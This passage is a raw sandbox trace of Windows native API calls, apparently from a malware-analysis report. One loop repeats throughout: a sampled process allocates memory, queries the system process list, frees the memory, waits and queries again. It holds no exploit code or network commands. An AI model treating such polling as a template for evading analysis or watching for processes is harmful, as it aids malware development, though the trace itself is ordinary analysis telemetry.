SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.790] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.797] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.812] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.819] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.834] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.849] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.856] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.877] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.884] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.891] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.898] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.906] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.913] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.920] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 